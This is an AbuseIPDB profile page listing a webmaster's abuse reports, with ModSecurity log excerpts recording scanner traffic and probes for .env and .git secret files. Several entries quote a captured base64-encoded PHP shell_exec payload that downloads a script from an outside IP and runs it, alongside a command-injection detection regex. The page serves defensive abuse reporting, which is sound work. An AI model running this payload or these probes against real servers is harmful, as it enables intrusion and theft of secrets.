subnetprotocol - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User subnetprotocol , the webmaster of subnetprotocol.com, joined AbuseIPDB in October 2024 and has reported 8,544 IP addresses.

Standing (weight) is good.

INACTIVE USER WEBMASTER

IP	Date	Comment	Categories
🇳🇱 89.248.168.227	15 May 2025	15/May/2025:04:35:21.359918 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:04:35:21.359918 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 89.248.168.227] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/118/224/541/310"] [tag "PCI/6.5.10"] [hostname "51.159.22.164"] [uri "/"] [unique_id "aCVS6fcBaZDKFa3UJwgF5QAAAsE"] 15/May/2025:04:48:01.340406 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 89.248.168.227] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/etc/a ... show less	Hacking Web App Attack
🇳🇱 93.123.109.228	15 May 2025	15/May/2025:04:50:32.451506 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:04:50:32.451506 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "51.159.22.164"] [uri "/.env.save"] [unique_id "aCVWeA9KzwQyaVJs4Q-OLQAAAkg"] 15/May/2025:04:50:32.585932 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPL ... show less	Hacking Web App Attack
🇱🇹 91.224.92.86	15 May 2025	15/May/2025:04:32:05.238885 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:04:32:05.238885 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 91.224.92.86] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "mignonne.com"] [uri "/.env.production"] [unique_id "aCVSJcAg4JpOw-r-wmcFBAAAAE0"] 15/May/2025:04:32:05.284466 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 91.224.92.86] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-9 ... show less	Hacking Web App Attack
🇳🇱 196.251.86.175	15 May 2025	15/May/2025:02:32:07.751202 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:02:32:07.751202 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.86.175] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env"] [unique_id "aCU2B0Qa-QcUEr7cVtG4PAAABBA"] 15/May/2025:02:32:25.155323 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.86.175] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-AT ... show less	Hacking Web App Attack
🇳🇱 196.251.70.87	15 May 2025	15/May/2025:02:04:04.423129 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:02:04:04.423129 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env.save"] [unique_id "aCUvdEQa-QcUEr7cVtGnYAAABAo"] 15/May/2025:02:05:18.539145 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLIC ... show less	Hacking Web App Attack
🇹🇷 198.55.98.76	14 May 2025	15/May/2025:01:17:45.638504 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:01:17:45.638504 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 198.55.98.76] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env.save"] [unique_id "aCUkmUxXfn_uUxHydkyQoQAAA8g"] 15/May/2025:01:18:49.130302 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 198.55.98.76] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICAT ... show less	Hacking Web App Attack
🇳🇱 93.123.109.230	14 May 2025	15/May/2025:00:28:27.744218 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 15/May/2025:00:28:27.744218 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env_sample"] [unique_id "aCUZCwF3VTieDeHdxzn1iAAABYU"] 15/May/2025:00:28:30.911122 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.230] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930 ... show less	Hacking Web App Attack
🇳🇱 196.251.73.140	14 May 2025	14/May/2025:23:50:41.641889 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:23:50:41.641889 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.73.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env"] [unique_id "aCUQMRbQjj39JgGMuio9FgAABMc"] 14/May/2025:23:51:08.002483 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.73.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-AT ... show less	Hacking Web App Attack
🇳🇱 196.251.70.87	14 May 2025	14/May/2025:22:24:51.204362 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:22:24:51.204362 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/.git/refs/"] [unique_id "aCT8E0QPzLXXj9sJtD7sZwAACMo"] 14/May/2025:22:27:04.910176 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-A ... show less	Hacking Web App Attack
🇳🇱 196.251.80.2	14 May 2025	14/May/2025:22:21:59.466119 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:22:21:59.466119 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.80.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.45.16"] [uri "/.env"] [unique_id "aCT7Z4VgojESadXxUIwc8AAACQ4"] 14/May/2025:22:23:07.057162 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.80.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK ... show less	Hacking Web App Attack
🇳🇱 93.123.109.228	14 May 2025	14/May/2025:22:14:10.991368 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:22:14:10.991368 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/.env.preprod"] [unique_id "aCT5kroRPwOkx5L7xYxBfQAAA0w"] 14/May/2025:22:14:11.154538 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-93 ... show less	Hacking Web App Attack
🇻🇳 103.39.93.93	14 May 2025	14/May/2025:21:39:35.082756 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:21:39:35.082756 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 103.39.93.93] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [id ... show less	Hacking Web App Attack
🇵🇰 221.132.115.18	14 May 2025	14/May/2025:20:52:46.335058 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:20:52:46.335058 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 221.132.115.18] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [ ... show less	Hacking Web App Attack
🇳🇱 196.251.70.87	14 May 2025	14/May/2025:19:57:41.067038 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:19:57:41.067038 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env"] [unique_id "aCTZlPVajKM64CfzgbARGwAAAs8"] 14/May/2025:19:58:30.159536 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTA ... show less	Hacking Web App Attack
🇹🇷 198.55.98.76	14 May 2025	14/May/2025:19:54:31.481300 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:19:54:31.481300 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 198.55.98.76] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.40.96"] [uri "/.env"] [unique_id "aCTY1wz5wAb4QfzbE4lDrAAAAhY"] 14/May/2025:19:54:58.945892 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 198.55.98.76] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK ... show less	Hacking Web App Attack
🇳🇱 93.123.109.230	14 May 2025	14/May/2025:18:20:11.436360 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:18:20:11.436360 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/.env.config"] [unique_id "aCTCu2PDuOCUOoHDz_hbXQAABIA"] 14/May/2025:18:20:12.022821 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930- ... show less	Hacking Web App Attack
🇺🇸 135.237.125.213	14 May 2025	14/May/2025:18:14:59.575135 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:18:14:59.575135 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 135.237.125.213] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/118/224/541/310"] [tag "PCI/6.5.10"] [hostname "212.129.40.96"] [uri "/login"] [unique_id "aCTBg2L5RkSHTqgB-rbQUAAABZU"] 14/May/2025:18:15:02.397126 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 135.237.125.213] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file ... show less	Hacking Web App Attack
🇳🇱 93.123.109.231	14 May 2025	14/May/2025:16:57:37.247666 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:16:57:37.247666 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.231] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /public/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.1.53"] [uri "/public/.git/config"] [unique_id "aCSvYQE20UNQPBrm3lkdkQAAAwM"] 14/May/2025:16:57:37.712739 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 93.123.109.231] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rul ... show less	Hacking Web App Attack
🇭🇰 154.92.109.116	14 May 2025	14/May/2025:16:51:32.561846 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:16:51:32.561846 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 154.92.109.116] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] [ ... show less	Hacking Web App Attack
🇳🇱 196.251.70.87	14 May 2025	14/May/2025:16:25:06.990427 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:16:25:06.990427 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "125"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/255/153/126"] [tag "PCI/6.5.4"] [hostname "212.129.0.235"] [uri "/.git/HEAD"] [unique_id "aCSnwkgxTDhJir2mrqZ15AAAA8c"] 14/May/2025:16:30:01.173011 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 196.251.70.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APP ... show less	Hacking Web App Attack
🇨🇳 124.115.231.142	14 May 2025	14/May/2025:16:04:57.426684 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client ... show more 14/May/2025:16:04:57.426684 +0200Apache-Error: [file "apache2_util.c"] [line 275] [level 3] [client 124.115.231.142] ModSecurity: Warning. Pattern match "(?i)(?:;\|\\\\\\\\{\|\\\\\\\\\|\|\\\\\\\\\|\\\\\\\\\|\|&\|&&\|\\\\\\\\n\|\\\\\\\\r\|`)\\\\\\\\s[\\\\\\\\(,@\\\\\\\\'\\\\"\\\\\\\\s](?:[\\\\\\\\w'\\\\"\\\\\\\\./]+/\|[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]\\\\\\\\w[\\\\\\\\\\\\\\\\'\\\\"\\\\\\\\^]:.\\\\\\\\\\\\\\\\\|[\\\\\\\\^\\\\\\\\.\\\\\\\\w '\\\\"/\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\)?[\\\\"\\\\\\\\^](?:m[\\\\"\\\\\\\\^](?:y[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^]q[\\\\"\\\\\\\\^]l(?:[\\\\"\\\\\\\\^](?:d[\\\\"\\\\\\\\^]u[\\\\"\\\\\\\\^]m[\\\\"\\\\\\\\^]p(?:[\\\\"\\\\\\\\^]s[\\\\"\\\\\\\\^ ..." at ARGS:<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNy4xNTAuMC4xMDMvc2ggfHwgd2dldCBodHRwOi8vMTA3LjE1MC4wLjEwMy9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "256"] ... show less	Hacking Web App Attack
